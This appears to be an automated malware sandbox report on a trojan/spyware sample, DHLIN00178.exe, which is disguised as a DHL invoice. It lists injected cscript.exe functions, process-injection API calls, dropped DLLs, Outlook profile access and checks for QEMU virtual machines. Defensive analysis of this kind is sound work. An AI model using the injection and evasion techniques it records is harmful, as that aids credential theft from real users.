Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C5717A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CD010E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CAD130
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04BFD2EC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CC124C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C2D210
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04BD2245
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C01380
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C1E310
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CCF330
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C28CDF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C97CE8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C2FCE0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CDACEB
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CA9C98
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CBEC4C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CC6C69
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CCEC60
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C00C12
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C1AC20
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C8EC20
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C19DD0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CAFDF4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C22DB0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CC7D4C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C10D69
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C0AD00
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CCFD27
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CC9ED2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C02EE8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CC0EAD
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C11EB2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C52E48
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C30E50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CB0E6D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CC1FC6
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C16FE0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CCEFBF
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C8FF40
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CCFF63
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C1CF00
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CC18DA
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CC78F3
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C26882
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C898B2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C19870
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C2B870
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C85870
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CCF872
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C13800
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C3E810
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04BF6868
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CB0835
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C559C0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04BD99E8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C0E9A0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CCE9A6
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CCFA89
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C2FAA0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CCEA5B
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CCCA13
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C84BC0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C10B10
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C4DB19
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04CCFB2E
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_00608D90
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_00620041
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_0060A220
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_0060A21C
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_00603827
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_00603830
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_0061E920
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_0061F9DA
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_00603A50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_00601AD0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_00620BE0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_00620BEC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_00620E50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_0061FFFE
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 04C45050 appears 36 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 04C57BE4 appears 94 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 04BFB910 appears 250 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 04C7E692 appears 86 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: String function: 04C8EF10 appears 94 times
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C434E0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42CF0 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42C30 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42D10 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42E50 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42F00 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C429F0 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42AC0 NtEnumerateValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42A80 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42A10 NtWriteFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42BC0 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42B80 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42B90 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42B00 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42B10 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C44570 NtSuspendThread,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C44260 NtSetContextThread,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42CD0 NtEnumerateKey,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C43C90 NtOpenThread,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42C50 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42C10 NtOpenProcess,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42C20 NtSetInformationFile,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C43C30 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42DA0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42D50 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42EC0 NtQuerySection,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42ED0 NtResumeThread,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42E80 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42EB0 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42E00 NtQueueApcThread,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42FB0 NtSetValueKey,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42F30 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C438D0 NtGetContextThread,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C429D0 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42AA0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42BE0 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_04C42B20 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_0061C820 NtCreateFile,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_0061C8D0 NtReadFile,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_0061C950 NtClose,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_0061C920 NtDeleteFile,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_0061CA00 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_0061C8CA NtReadFile,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_0061C94A NtClose,
Source: C:\Windows\SysWOW64\cscript.exe Code function: 8_2_0061C91A NtDeleteFile,
        Source: System.dll.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: C:\Users\user\Desktop\DHLIN00178.exeProcess Stats: CPU usage > 98%
        Source: System.Security.Cryptography.X509Certificates.dll.1.drStatic PE information: No import functions for PE file found
        Source: DHLIN00178.exe, 00000001.00000003.4687395558.00000000029AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.X509Certificates.dll@ vs DHLIN00178.exe
        Source: DHLIN00178.exe, 00000001.00000002.6090038594.0000000000469000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs DHLIN00178.exe
        Source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSolutionExplorerCLI.dll vs DHLIN00178.exe
        Source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemaintenanceservice.exe0 vs DHLIN00178.exe
        Source: DHLIN00178.exe, 00000001.00000003.4690708981.00000000029A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepkcs11-helper-1.dll" vs DHLIN00178.exe
        Source: DHLIN00178.exe, 00000001.00000003.4688853178.00000000029AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dll@ vs DHLIN00178.exe
        Source: DHLIN00178.exe, 00000005.00000002.7004230213.00000000000E0000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs DHLIN00178.exe
        Source: DHLIN00178.exe, 00000005.00000003.6918023032.0000000037A87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHLIN00178.exe
        Source: DHLIN00178.exe, 00000005.00000003.7001543473.00000000076B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs DHLIN00178.exe
        Source: DHLIN00178.exe, 00000005.00000000.5906940154.0000000000469000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBrankningens.exeDVarFileInfo$ vs DHLIN00178.exe
        Source: C:\Users\user\Desktop\DHLIN00178.exeSection loaded: edgegdi.dll
        Source: C:\Users\user\Desktop\DHLIN00178.exeSection loaded: edgegdi.dll
        Source: C:\Windows\SysWOW64\cscript.exeSection loaded: edgegdi.dll
        Source: DHLIN00178.exeStatic PE information: invalid certificate
        Source: percentile.dll.1.drStatic PE information: Number of sections : 19 > 10
        Source: libdatrie-1.dll.1.drStatic PE information: Number of sections : 11 > 10
        Source: libpkcs11-helper-1.dll.1.drStatic PE information: Number of sections : 12 > 10
        Source: DHLIN00178.exeVirustotal: Detection: 12%
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile read: C:\Users\user\Desktop\DHLIN00178.exe
        Source: DHLIN00178.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\DHLIN00178.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Users\user\Desktop\DHLIN00178.exe C:\Users\user\Desktop\DHLIN00178.exe
        Source: C:\Users\user\Desktop\DHLIN00178.exeProcess created: C:\Users\user\Desktop\DHLIN00178.exe C:\Users\user\Desktop\DHLIN00178.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
        Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5256 -s 284
        Source: C:\Users\user\Desktop\DHLIN00178.exeProcess created: C:\Users\user\Desktop\DHLIN00178.exe C:\Users\user\Desktop\DHLIN00178.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
        Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Users\user\Desktop\DHLIN00178.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_00403235 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile created: C:\Users\user\AppData\Local\Temp\nsd1F79.tmp
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/11@19/17
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_00402138 CoCreateInstance,MultiByteToWideChar,
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_004044FA GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
        Source: C:\Windows\SysWOW64\cscript.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
        Source: DHLIN00178.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: cscript.pdbUGP source: DHLIN00178.exe, 00000005.00000002.7004230213.00000000000E0000.00000040.10000000.00040000.00000000.sdmp, DHLIN00178.exe, 00000005.00000003.7001543473.00000000076B7000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdbSHA256n source: DHLIN00178.exe, 00000001.00000003.4688853178.00000000029AB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: maintenanceservice.pdb@ 0%P% source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\net6.0-windows-Release\System.Security.Cryptography.X509Certificates.pdb source: DHLIN00178.exe, 00000001.00000003.4687395558.00000000029AC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: DHLIN00178.exe, 00000005.00000001.5907937864.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: System.Security.Cryptography.X509Certificates.ni.pdb source: DHLIN00178.exe, 00000001.00000003.4687395558.00000000029AC000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdb source: DHLIN00178.exe, 00000001.00000003.4688853178.00000000029AB000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: DHLIN00178.exe, 00000005.00000003.6912516451.00000000377A9000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000005.00000003.6918023032.000000003795A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: E:\Builds\221\N2\HO_SE_g_2016_r_0\Sources\SolutionExplorer\target\nar\bin\x86-Windows-msvc\release\SolutionExplorerCLI.pdb source: DHLIN00178.exe, 00000001.00000003.4684588231.00000000029A4000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: DHLIN00178.exe, 00000005.00000003.6912516451.00000000377A9000.00000004.00000020.00020000.00000000.sdmp, DHLIN00178.exe, 00000005.00000003.6918023032.000000003795A000.00000004.00000020.00020000.00000000.sdmp, cscript.exe
        Source: Binary string: mshtml.pdbUGP source: DHLIN00178.exe, 00000005.00000001.5907937864.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: maintenanceservice.pdb source: DHLIN00178.exe, 00000001.00000003.4691888119.00000000029AA000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: cscript.pdb source: DHLIN00178.exe, 00000005.00000002.7004230213.00000000000E0000.00000040.10000000.00040000.00000000.sdmp, DHLIN00178.exe, 00000005.00000003.7001543473.00000000076B7000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        Source: Yara matchFile source: 00000001.00000002.6092061877.000000000A021000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB72F9 push 3871B644h; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB6CAA push eax; retf
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB60A2 push ds; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB6C66 push eax; retf
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB4A36 push 790893ADh; ret
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB5835 push cs; ret
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB7FDC push eax; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB75B0 push 3B99B644h; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB5992 push ss; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB755E push cs; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB6332 push ebx; retf
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 1_2_04EB550B push ds; retf
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_0166755E push cs; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_01666332 push ebx; retf
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_0166550B push ds; retf
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_01667FDC push eax; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_016675B0 push 3B99B644h; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_01665992 push ss; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_01666C66 push eax; retf
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_01664A36 push 790893ADh; ret
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_01665835 push cs; ret
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_016672F9 push 3871B644h; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_016660A2 push ds; iretd
        Source: C:\Users\user\Desktop\DHLIN00178.exeCode function: 5_2_01666CAA push eax; retf
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BD97A1 push es; iretd
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04BD21AD pushad ; retf 0004h
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C008CD push ecx; mov dword ptr [esp], ecx
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_0060715B push ds; retf
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_0061F1E7 push esi; ret
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_00621555 push ds; ret
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_0060D864 push ss; ret
        Source: libdatrie-1.dll.1.drStatic PE information: section name: .xdata
        Source: libpkcs11-helper-1.dll.1.drStatic PE information: section name: .xdata
        Source: maintenanceservice2.exe.1.drStatic PE information: section name: .00cfg
        Source: percentile.dll.1.drStatic PE information: section name: .xdata
        Source: percentile.dll.1.drStatic PE information: section name: /4
        Source: percentile.dll.1.drStatic PE information: section name: /19
        Source: percentile.dll.1.drStatic PE information: section name: /31
        Source: percentile.dll.1.drStatic PE information: section name: /45
        Source: percentile.dll.1.drStatic PE information: section name: /57
        Source: percentile.dll.1.drStatic PE information: section name: /70
        Source: percentile.dll.1.drStatic PE information: section name: /81
        Source: percentile.dll.1.drStatic PE information: section name: /92
        Source: System.Security.Cryptography.X509Certificates.dll.1.drStatic PE information: 0xF15766E0 [Tue Apr 22 20:30:24 2098 UTC]
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile created: C:\Users\user\AppData\Local\Temp\nsj54D2.tmp\System.dll
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Maattet\System.Security.Cryptography.X509Certificates.dll
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Stingily\Nebularise\stormagasiners\maintenanceservice2.exe
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Maattet\SolutionExplorerCLI.dll
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Pointberegningernes241\Chaiselongs\Whatchamacallits76\querciflorae\libdatrie-1.dll
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Stingily\Nebularise\stormagasiners\libpkcs11-helper-1.dll
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Pointberegningernes241\Chaiselongs\Whatchamacallits76\querciflorae\System.dll
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Mandslinien\Characterizable\Senilitetstegnet\percentile.dll
        Source: C:\Users\user\Desktop\DHLIN00178.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DHLIN00178.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DHLIN00178.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DHLIN00178.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\Desktop\DHLIN00178.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\cscript.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Program Files\qga\qga.exe
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
        Source: C:\Users\user\Desktop\DHLIN00178.exeFile opened: C:\Program Files\qga\qga.exe
        Source: C:\Windows\explorer.exe TID: 5248Thread sleep time: -30000s >= -30000s
        Source: C:\Windows\SysWOW64\cscript.exe TID: 8096Thread sleep count: 71 > 30
        Source: C:\Windows\SysWOW64\cscript.exe TID: 8096Thread sleep time: -142000s >= -30000s
        Source: C:\Windows\explorer.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
        Source: C:\Windows\SysWOW64\cscript.exeLast function: Thread delayed
        Source: C:\Users\user\Desktop\DHLIN00178.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Maattet\System.Security.Cryptography.X509Certificates.dll
        Source: C:\Users\user\Desktop\DHLIN00178.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Stingily\Nebularise\stormagasiners\maintenanceservice2.exe
        Source: C:\Users\user\Desktop\DHLIN00178.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Maattet\SolutionExplorerCLI.dll
        Source: C:\Users\user\Desktop\DHLIN00178.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Pointberegningernes241\Chaiselongs\Whatchamacallits76\querciflorae\libdatrie-1.dll
        Source: C:\Users\user\Desktop\DHLIN00178.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Stingily\Nebularise\stormagasiners\libpkcs11-helper-1.dll
        Source: C:\Users\user\Desktop\DHLIN00178.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Mandslinien\Characterizable\Senilitetstegnet\percentile.dll
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 8_2_04C41763 rdtsc
